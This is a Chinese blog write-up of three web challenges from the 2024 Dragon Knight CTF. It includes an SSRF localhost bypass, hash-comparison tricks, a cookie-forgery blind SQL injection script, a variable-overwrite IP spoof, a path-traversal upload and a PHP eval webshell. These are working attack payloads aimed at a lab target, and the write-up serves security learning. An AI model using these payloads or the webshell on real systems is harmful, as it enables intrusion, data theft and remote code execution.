2024Dragon Knight CTF复现web

已于 2024-06-03 21:01:27 修改
阅读量1k 收藏 21
点赞数 31
文章标签: 安全
于 2024-05-31 22:57:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80913334/article/details/139291159
版权

穿梭隐藏的密钥

知识点:fuzz技术、ssrf、本地绕过、data伪协议、md4弱比较、数组绕过

首先看看页面的源代码,但是发现f12和鼠标右键都被禁用了

用ctrl+u查看,发现一个可疑页面

访问看看,发现还是只有一张图,查看源代码发现提示

扩展:

Fuzz:Fuzz是一种基于黑盒的自动化软件模糊测试技术,简单的说一种懒惰且暴力的技术融合了常见的以及精心构建的数据文本进行网站、软件安全性测试。

通过字典爆破向目标发送随机或精心构造的数据作为计算机输入,来触发非常规反馈以达到检测漏洞的目的。

Fuzz的核心思想:

  • 目录Fuzz(漏洞点)
  • 参数Fuzz(可利用参数)
  • PayloadFuzz(bypass)

常用工具:御剑、dirsearch、Arjun等

通过提示我们可以得知可能需要参数爆破,但是发现页面为图片,bp抓包也没发现能够爆破的位置 。猜测可能是需要爆破url,用御剑扫描

访问secret.php,发现需要本地(127.0.0.1)才能通过

用bp抓包,构造xff、client_ip、referer发现都不行

尝试ssrf伪造

?参数=http://127.0.0.1/secret.php

但是这里不知道参数是啥所以用Arjun爆破url

得到参数为shell

构造payload:

c3s4f.php?shell=http://127.0.0.1/secret.php

发现虽然成功了但是发现127.0.0.1并不行,可能是被正则禁用了

查看了一下官方的wp得知可以通过sudo.cc绕过

扩展:

sudo.cc指向IP地址127.0.0.1。A记录就是域名指向ip地址,然后可以通过A记录转向访问
类似的还有safe.taobao.com,114.taobao.com,test.xiaodi8.com等

成功得到key和下一关的入口

访问challeng3.php并且POST传参key=MSIBLG

成功进入下一关

// Challenge 1
if (isset($_GET['DrKn'])) {
    $text = $_GET['DrKn'];
    if(@file_get_contents($text) == $key) {
        echo "有点东西呢"."</br>".$key1."</br>";
    } else {
        die("貌似状态不在线啊(╯_╰)</br>");
    }
} 
//GET传参入一个Drkn=MSIBLG,得到key1

 构造payload:

cha11eng3.php?DrKn=data:text/plain,MSIBLG

key1=M_ore.8

// Challenge 2
if (isset($_GET[$key1])) {
    $damei = $_GET[$key1];
    if (hash("md4", $damei) == $damei) {
        echo "又近了一步呢,宝~"."</br>".$key2."</br>".$key3;
    } else {
        die("达咩哟~");
    }
} 
//md4弱比较得到key2

参考链接:[第四届-强网杯]:Funhash

科学计数法:

plaintext : 0e001233333333333334557778889
md4 hash : 0e434041524824285414215559233446

构造payload:

cha11eng3.php?DrKn=data:text/plain,MSIBLG&M_ore.8=0e001233333333333334557778889

 发现并没有第二层的回显猜测有可能是_划线被禁用了,用[绕过

payload:

cha11eng3.php?DrKn=data:text/plain,MSIBLG&M[ore.8=0e001233333333333334557778889

key2=wtf,key3=mC

// Challenge 3
if (isset($_POST[$key2]) && isset($_POST[$key3])) {
    $user = $_POST[$key2];
    $pass = $_POST[$key3];
  
    if (strlen($user) > 4 || strlen($pass) > 5) {
          die("还得练");
      }
     if ($user !== $pass && md5($user) === md5($pass)) {  
          echo "还不错哦"."$flag";
      }
      else {
          die("nonono") ;
      }
    }
//POST传入的key2的值的长度超过4或key3的值的长度超过5则输入"还得练"
//进行md5强比较得到flag

构造payload:

wtf[]=1&mC[]=2

得到flag

EzLogin

知识点:sql二次注入、盲注(cookie)、空格绕过

打开源代码查看发现提示有一个注册页面

访问

输入admin,123456尝试发现用户已存在

说明有一个admin用户,回到登入界面用bp抓包爆破密码发现用啥字典都爆不出来,猜测可能不是弱口令爆破换个思路。

cookie中一般会有用户的重要信息,用Hackbar查看一下网页的cookie

发现TOKEN=TOKEN=65794a3163325679626d46745a534936496d78706269497349434a306232746c62694936496d4d354d7a45324f5759785a574935596d55334d6a51325a6a6b354d4459354d4749315a545932596a4a6b49697767496d6c7a5832466b62576c75496a6f7766513d3d

放入Cyberchef里解密一下

可以看到注册的用户lin(在注册界面尝试时注册的)已经被放入cookie中,token的值是用md5加密的用户名,is_admin是判断用户是否为admin为0时登入则会显示“you are not admin!!!”

这里我们将0改为1并重新加密后添加到TOKEN中(先base64后16进制转换)

TOKEN=65794a3163325679626d46745a534936496d78706269497349434a306232746c62694936496d4d354d7a45324f5759785a574935596d55334d6a51325a6a6b354d4459354d4749315a545932596a4a6b49697767496d6c7a5832466b62576c75496a6f7866513d3d

再次登入,登入成功

尝试注册新的用户名但是发现登入还是这个界面,TOKEN值没变

改变TOKEN值,将用户名改变加密后再次带入TOKEN再次访问,发现页面变了

发现显示用户名没改,原来是token里的用户名没改,只改了TOKEN。

这时候我们试着判断是不是sql注入将用户名改为

lin' and 1=2#

{"username":"lin' and 1=2#", "token":"36147d74623b73489bfcc37c4f7153a2", "is_admin":1}

发现存在注入点但是应该被过滤了所以显示Hacker!!

感觉应该是空格被过滤了用 “ /**/ ” 绕过

{"username":"lin'/**/and/**/1=2#", "token":"2c82906aa4b07b321787b962c5a1e12d", "is_admin":1}

成功绕过,存在注入点。

用别的用户名尝试几次发现都是这两个界面,猜测这题可能需要sql盲注(只有正确和错误界面),注入点在TOKEN里的用户名里

尝试查看一下数据库长度发现数据库长度为五且发现admin账户的密码

接下来我们可以写个脚本注入(这里借鉴官方给的wp)

首先需要一个脚本来识别TOKEN和token里的用户名

def encode(payload):
    payload0 = payload
    md5pwd = hashlib.md5(payload0.encode()).hexdigest()    #把payload md5加密
    json_payload = f'{{"username":"{payload0}", "token":"{md5pwd}", "is_admin":1}}'

    encoded_payload = base64.b64encode(json_payload.encode()) #base64加密
    hexadecimal_payload = encoded_payload.hex()  #十六进制编码
    return hexadecimal_payload

完整脚本:

import base64
import hashlib
import requests

def encode(payload):
    payload0 = payload
    md5pwd = hashlib.md5(payload0.encode()).hexdigest()    #把payload md5加密
    json_payload = f'{{"username":"{payload0}", "token":"{md5pwd}", "is_admin":1}}'

    encoded_payload = base64.b64encode(json_payload.encode()) #base64加密
    hexadecimal_payload = encoded_payload.hex()  #十六进制编码
    return hexadecimal_payload

def ascii_str():  # 生成库名表名字符所在的字符列表字典
    str_list = []
    for i in range(33, 127):  # 所有可显示字符
        str_list.append(chr(i))
    #print('可显示字符:%s'%str_list)
    return str_list  # 返回字符列表


def db_length(url, str):
    print("[-]开始测试数据库名长度.......")
    num = 1
    while True:
        payload = f"admin'/**/and/**/length(database())={num}#"
        db_payload = encode(payload)
        cookies = {"TOKEN":db_payload}
        r = requests.get(url=url,cookies=cookies)
        if str in r.text:
            db_length = num
            print("[+]数据库长度:%d\n" % db_length)
            db_name(db_length)  # 进行下一步,测试库名
            break
        else:
            num += 1


def db_name(db_length):
    print("[-]开始测试数据库名.......")
    db_name = ''
    str_list = ascii_str()
    for i in range(1, db_length + 1):
        for j in str_list:
            payload = f"admin'/**/and/**/(ascii(substr(database(),{i},1))={ord(j)})#"
            db_payload = encode(payload)
            cookies = {"TOKEN": db_payload}
            r = requests.get(url=url, cookies=cookies)
            if str in r.text:
                db_name += j
                break
    print("[+]数据库名:%s\n" % db_name)
    tb_piece(db_name)  # 进行下一步,测试security数据库有几张表
    return db_name


def tb_piece(db_name):
    global tb_piece
    print("开始测试%s数据库有几张表........" % db_name)
    for i in range(10):  # 猜解库中有多少张表,合理范围即可
        payload = f"admin'/**/and/**/{i}=(Select/**/Count(Table_name)/**/From/**/Information_schema.tables/**/Where/**/table_schema='{db_name}')#"
        tb_payload = encode(payload)
        cookies = {"TOKEN": tb_payload}
        r = requests.get(url=url, cookies=cookies)
        if str in r.text:
            tb_piece = i
            break
    print(f"[+]{db_name}库一共有{tb_piece}张表\n")
    tb_name(db_name, tb_piece)  # 进行下一步,猜解表名


def tb_name(db_name, tb_piece):
    print("[-]开始猜解表名.......")
    table_list = []
    for i in range(tb_piece):
        str_list = ascii_str()
        tb_length = 0
        tb_name = ''
        for j in range(1, 20):  # 表名长度,合理范围即可
            payload = f"admin'/**/and/**/(Select/**/length(table_name)/**/from/**/Information_schema.tables/**/Where/**/table_schema=database()/**/limit/**/{i},1)={j}#"
            tb_payload = encode(payload)
            cookies = {"TOKEN": tb_payload}
            r = requests.get(url=url, cookies=cookies)
            if str in r.text:
                tb_length = j
                print("第%d张表名长度:%s" % (i + 1, tb_length))
                for k in range(1, tb_length + 1):  # 根据表名长度进行截取对比
                    for l in str_list:
                        payload = f"admin'/**/and/**/(Select/**/ascii(substr((Select/**/table_name/**/from/**/Information_schema.tables/**/Where/**/table_schema=database()/**/limit/**/{i},1),{k},1)))={ord(l)}#"
                        tb_payload = encode(payload)
                        cookies = {"TOKEN": tb_payload}
                        r = requests.get(url=url, cookies=cookies)
                        if str in r.text:
                            tb_name += l
                print("[+]:%s" % tb_name)
                table_list.append(tb_name)
                break
    print("\n[+]%s库下的%s张表:%s\n" % (db_name, tb_piece, table_list))
    column_num(table_list, db_name)  # 进行下一步,猜解每张表的字段数


def column_num(table_list, db_name):
    print("[-]开始猜解每张表的字段数:.......")
    column_num_list = []
    for i in table_list:
        for j in range(60):  # 每张表的字段数量,合理范围即可
            payload =f"admin'/**/and/**/{j}=(Select/**/count(column_name)/**/from/**/Information_schema.columns/**/Where/**/table_name='{i}')#"
            column_payload = encode(payload)
            cookies = {"TOKEN": column_payload}
            r = requests.get(url=url, cookies=cookies)
            if str in r.text:
                column_num = j
                column_num_list.append(column_num)  # 把所有表的字段,依次放入这个列表当中
                print("[+]%s表\t%s个字段" % (i, column_num))
                break
    print("\n[+]表对应的字段数:%s\n" % column_num_list)
    column_name(table_list, column_num_list, db_name)  # 进行下一步,猜解每张表的字段名


def column_name(table_list, column_num_list, db_name):
    print("[-]开始猜解每张表的字段名.......")
    column_length = []
    str_list = ascii_str()
    column_name_list = []
    for t in range(len(table_list)):  # t在这里代表每张表的列表索引位置
        print("\n[+]%s表的字段:" % table_list[t])
        for i in range(column_num_list[t]):  # i表示每张表的字段数量
            column_name = ''
            for j in range(1, 21):  # j表示每个字段的长度
                payload = f"admin'/**/and/**/{j-1}=(Select/**/length(column_name)/**/from/**/Information_schema.columns/**/Where/**/table_name='{table_list[t]}'/**/limit/**/{i},1)#"
                column_name_length = encode(payload)
                cookies = {"TOKEN": column_name_length}
                r = requests.get(url=url, cookies=cookies)
                if str in r.text:
                    column_length.append(j)
                    break
                for k in str_list:  # k表示我们猜解的字符字典
                    payload = f"admin'/**/and/**/ascii(substr((Select/**/column_name/**/from/**/Information_schema.columns/**/Where/**/table_name='{table_list[t]}'/**/limit/**/{i},1),{j},1))={ord(k)}#"
                    column_payload = encode(payload)
                    cookies = {"TOKEN": column_payload}
                    r = requests.get(url=url, cookies=cookies)
                    if str in r.text:
                        column_name += k
            print('[+]:%s' % column_name)
            column_name_list.append(column_name)
    # print(column_name_list)#输出所有表中的字段名到一个列表中
    dump_data(table_list, column_name_list,)  # 进行最后一步,输出指定字段的数据


def dump_data(table_list,column_name_list,url,str):
    print("[-]开始爆破字段内容:")
    for l in range(1, 50):  # l表示每条数据的长度,合理范围即可
        for k in range(32,127):
            payload = f"admin'/**/and/**/Ascii(Substr((Select/**/{column_name_list[0]}/**/from/**/{table_list[0]}/**/limit/**/0,1),{l},1))={k}#"
            data_len_payload = encode(payload)
            cookies = {"TOKEN": data_len_payload}
            r = requests.get(url=url, cookies=cookies)
            if (str in r.text):
                character = chr(k)
                print(character,end="")
                break
            #r.text:响应内容的字符串形式


if __name__ == '__main__':
    url = "http://challenge.qsnctf.com:30041/home.php"  # 目标url
    str = "@q^4*!z8a9-%42z.s~"
    db_length(url, str)

爆到这里时由于user表字段数较多,另一个表更可能含有flag所以我们可以跳过user的查看

if __name__ == '__main__':
    url = "http://challenge.qsnctf.com:30041/home.php"  # 目标url
    str = "@q^4*!z8a9-%42z.s~"
    table_list=["secret"]
    column_num(table_list, db_name)

得到一个flag列和sseeccrreett列

分别查看

if __name__ == '__main__':
    url = "http://challenge.qsnctf.com:30041/home.php"  # 目标url
    str = "@q^4*!z8a9-%42z.s~"
    table_list=["secret"]
    column_name_list=["sseeccrreett"]
    dump_data(table_list,column_name_list,url,str)

最终在sseeccrreett列得到flag:flag{aa9a14ed7c154b02bb8d41343344aa07}

ezsign

知识点:$_SERVER['REMOTE_ADDR']、代码审计、文件上传、目录穿越

进去是一个登入界面输入admin密码123456发现直接就进入了,是一个留言板界面

看到留言板尝试一下有没有xss漏洞

发现成功弹窗了存在xss漏洞,尝试用BlueLotus弹一下cookie发现没有得到cookie。用{{7*7}}尝试并没有得到49不是ssti注入。所以应该都不是。

尝试用御剑扫一下网站(实在不知道干嘛了扫下试试)

发现扫到了一个文件上传的页面和一个bak文件

访问文件上传的页面进去是一个上传失败,下载bak文件打开看看发现一串代码

<?php 
error_reporting(0);
// 检查 cookie 中是否有 token
$token = $_COOKIE['token'] ?? null;

if($token){
    extract($_GET);
    $token = base64_decode($token);
    $token = json_decode($token, true);


    $username = $token['username'];
    $password = $token['password'];
    $isLocal = false;
    
    if($_SERVER['REMOTE_ADDR'] == "127.0.0.1"){
        $isLocal = true;
    }

    if($isLocal){
        echo 'Welcome Back,' . $username . '!';
        //如果 upload 目录下存在$username.png文件,则显示图片
        if(file_exists('upload/' . $username . '/' . $token['filename'])){
            // 显示图片,缩小图片
            echo '<br>';
            echo '<img src="upload/' . $username . '/' . $token['filename'] .'" width="200">';
        } else {
            echo '请上传您高贵的头像。';
            // 写一个上传头像的功能
            $html = <<<EOD
            <form method="post" action="upload.php" enctype="multipart/form-data">
                <input type="file" name="file" id="file">
                <input type="submit" value="Upload">
            </form>
            EOD;
            echo $html;
        }
    } else {
        // echo "留个言吧";
        $html = <<<EOD
        <h1>留言板</h1>
        <label for="input-text">Enter some text:</label>
        <input type="text" id="input-text" placeholder="Type here...">
        <button onclick="displayInput()">Display</button>
        EOD;
        echo $html;
    }
} else {
    $html = <<<EOD
<!DOCTYPE html>
<html>
<head>
    <title>Login</title>
</head>
<body>
    <h2>Login</h2>
    <form method="post" action="./login.php">
        <div>
            <label for="username">Username:</label>
            <input type="text" name="username" id="username" required>
        </div>
        <div>
            <label for="password">Password:</label>
            <input type="password" name="password" id="password" required>
        </div>
        <div>
            <input type="submit" value="Login">
        </div>
    </form>
</body>
</html>
EOD;
    echo $html;
}
?>

<script>
    function displayInput() {
      var inputText = document.getElementById("input-text").value;
      document.write(inputText)
    }
</script>

可以发现有一个变量覆盖函数extract($_GET);

根据代码我们可以得知当系统变量$_SERVER['REMOTE_ADDR']=127.0.0.1时才可以进入文件上传的界面

补充:

$_S​ERVER[′REMOTE_A​DDR′]是一个在PHP中用来获取访问者的IP地址的超级全局变量。这个变量包含了当前请求的远程IP地址。它是服务器自动全局可访问的变量之一,可以在任何地方通过访问

 利用extract($_GET)这一点,我们可以直接在url里将$_S​ERVER[′REMOTE_A​DDR′]=127.0.0.1

?_SERVER[REMOTE_ADDR]=127.0.0.1

# _SERVER[REMOTE_ADDR] 并不是一个真正的 $_SERVER 数组中的元素,而是一个由 extract($_GET) 创建的普通变量。

进入文件上传界面,但是并没有发现上传文件的地方

上传一句话木马文件查看但是并没有返回路径

再次访问可以发现已经显示图片,查看源代码

上传的文件路径为upload/[username]/[filename]

访问文件路径看看,可以发现被解析为text/plain

猜测在admin目录下的文件会被解析为text/plain

由于bak文件中规定了

所以上传的文件一定会被上传到upload/[username]目录导致文件不被解析(出题者在upload目录放了一个.htaccess文件导致php无法被解析)

此时我们可以考虑用目录穿越将文件上传至网站的根目录var/www/html从而绕过upload这个目录。

将token里的username改为../../html

 {"username":"../../html","password":"","filename":"shell.php"}

base64加密后再次带回token运行此时回到文件上传界面,这时再次传入一句话木马文件

 

这时候会发现shell.php在html目录下

<?php
    @eval($_POST["shell"]);
?>

直接访问shell.php,并进行rce

用cat读取文件得到flag

 

lin0-0_0
关注
  • 31
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
国科大web安全中期CTF.pdf
11-22
国科大web安全中期CTF
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
DragonKnight CTF复现(一)
2302_79135465的博客
05-27 1022
这次的 re 题也是挺难的,按 wp 来学习一波。
DragonKnight CTF &&angstromctf--pwn
A13837377363的博客
05-25 348
看我的exp也知道我本来尝试orw也没成功,直接系统调用execve倒是成功了,也不知道背后原理。可用0x40119b这个gadget重复写,并且末尾有leave,顺便栈迁移。这道题有点奇怪,直接用system打是打不通的,考虑堆栈平衡也打不通。
KnightCTF-2022_The Hungry Dragon
weixin_46245411的博客
01-23 502
我感觉这是一个很有意思的3D 文件(附上链接:The Hungry Dragon) 打开发现是一个3D模型, 然后下一步需要看一下有没有什么其他信息, 这里提示说“需要发现这条龙吃了多少甜甜圈和糖果”,所以我们需要“进入它的身体看看~” 点击“混合现实”, 直接滑动鼠标滚轮,进入恐龙的食道, 可以看到,确实“有点东西”在里面。 下一步就是统计一下绿色的糖果和黄色的甜甜圈了, 虽然都是两个“绿色的糖果”和一个“黄色的甜甜圈”,但是仔细一点就可以发现,它们出...
2024 KnightCTF re wp
wmr66的博客
01-22 477
2024 KnightCTF rev方向完整wp
记录 Dragon Knight CTF
2301_76910271的博客
06-02 973
记录一下心得与学到的东西
网络安全CTFWeb基础
晓梦林的博客
09-21 7078
Web类的考试,在CTF比赛中十分常见。本人从计算机专业转网络安全发展,属于半路出家,一知半解,如有总结不到位的地方,欢迎交流分享。
github+docker复现CTF-web题目
MercyLin的博客
09-11 3632
git clone + 网址 + 本地目录 例如我要复现rctf的一道题目,首先我在github上找到这道题目 点击Clone复制网址
docker复现CTF web题步骤与解决方案
yink12138的博客
03-07 1367
标准步骤: 下载题目源码,控制台进入带有Dockerfile的文件夹 docker build -t <image-name> . 以自定义的镜像名创建一个镜像 docker run -i -d -P <image-name> 为指定镜像创建容器并运行 用到的option:-d 后台运行 -P 随机把容器的端口映射到一个主机未使用的高端口 -p 格式为主机端口:容器端口 ,自选端口映射 -i 以交互模式运行容器,常与-t连用 -t 为容器重新分配一个伪输入终端,常与-
ctf web基本步骤
热门推荐
小小白的博客
06-27 3万+
大家做ctf简单点的都可以用这些判断,基本上都会有,除非个别变态的。 1. 看源码 可以右键->【查看网页源代码】,也可以用火狐和谷歌浏览器的按F12键,按F12键可以修改html源代码方便构造一些值提交,但如果不需要的话直接右键查看源代码更直观,看网页里面的注释之类的都很方便。 2. 抓包 这几天接触到的抓包一般是用burpsuite,如果要多次尝试可以右键->【send t...
CTF工具之WEB.zip
10-07
【标题】:CTF工具之WEB.zip 【正文】: CTF(Capture The Flag)是一项网络安全竞赛,参与者通过解决各种安全挑战来展示他们的技术技能。这个名为“CTF工具之WEB.zip”的压缩包,显然是专门为参与此类比赛的选手...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF·WEB入门之路
qq_54502707的博客
12-12 6866
Hello~大家好,这里是KOKO师傅! 对于初学者来说,打CTF之路仿佛是摸石头过河,而今天这篇文章则是一篇“从入门到入土”级别的概括类文章。从这篇文章中你可以了解到CTF的一些基本知识、WEB方向的主要知识点、常见知识点······真正意义上的实现入门!
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 565
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1458
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
最新发布
Thewei666的博客
07-17 840
区分不同的签名。
六一战队夺魁青少年CTF擂台赛2024_round1:Web与Pwn解题揭秘
青少年CTF擂台挑战赛2024第一轮(#round 1)是一项针对青少年的信息安全竞赛,参赛队伍sixone战队在本次比赛中取得了显著的成绩。比赛涵盖多种技术领域,包括Web应用安全Web1到Web5)、逆向工程(Reverse1)、密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值